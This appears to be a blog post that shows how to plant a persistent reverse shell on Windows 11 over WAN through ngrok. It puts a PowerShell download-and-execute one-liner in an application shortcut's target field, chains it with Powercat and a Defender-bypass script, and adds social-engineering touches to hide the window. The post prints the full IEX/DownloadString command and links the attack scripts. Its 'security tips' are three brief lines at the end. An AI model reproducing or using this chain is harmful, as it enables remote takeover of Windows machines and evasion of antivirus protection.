Security Tips Against Attacks on Windows 11 and Microsoft Edge via WAN
NOTE: Hello, this blog post has been written for the purpose of education and raising awareness about information security. It is essential to use authorized legal methods (White Box Test, Grey Box Test) as mentioned in this post. Our main FOCUS is on the SECURITY ADVICE section. Be sure to read that part.
Test Environment Versions
PowerShell Version Command -> Get-Host
Version 5.1.22621.169
Windows Version Command -> [Environment]::OSVersion
Windows 11 Pro 10.0.22621
Microsoft Defender Version Command -> Get-MpComputerStatus
AntivirusSignatureVersion : 1.377.509.0
The fundamental technique is get a reverse shell by using the application target field.(GIF 1)
Used ngrok for WAN to LAN attack. I have mentioned the installation steps in other sections.
Three scripts used. The first script was Powercat, which was used to establish a reverse shell. The second script was used to bypass Microsoft Defender. Finally, the third script merged the first and second scripts and included some social engineering techniques, such as configuring the terminal window size, closing the terminal window, and opening Microsoft Edge.
My PowerShell Script Link
Ngrok TCP URL and PORT number must be change in powershell script.
Suspicious PowerShell Script For Application Target Field
powershell.exe -c “IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/OsmanKandemir/PowerSTest/main/run.ps1');run"
Test
The simulation has been completed over TCP, with port forwarding from WAN to LAN. Unfortunately, everything seems fine, but Defender and AV have been bypassed (as shown in GIF 2). Kali Linux is running on VMware, and both Kali and W11 are on the same network, but the attack is running over WAN.
A malicious person can get a continuous reverse shell using this method.
This method has a small difference from other methods, allows broken connections to be reconnected.
Social Engineering
A malicious person could quickly write a suspicious script in the target field of an application.
The PowerShell script (called “Suspicious Powershell Script For Target Field”) runs the “run.ps1” file when it is downloaded.
Security Tips
- If you leave your computer, you should use a lock screen.
- If you see a suspicious application running in a CMD or PowerShell window, you should be also killed it using the task manager.
- You might block “powershell.exe” on Local Group Policy Editor. (Figure 1)
Stay Safe.
Resources
1-https://github.com/OsmanKandemir/PowerSTest/blob/main/run.ps1
2-https://github.com/besimorhino/powercat
3-https://github.com/aloksaurabh/OffenPowerSh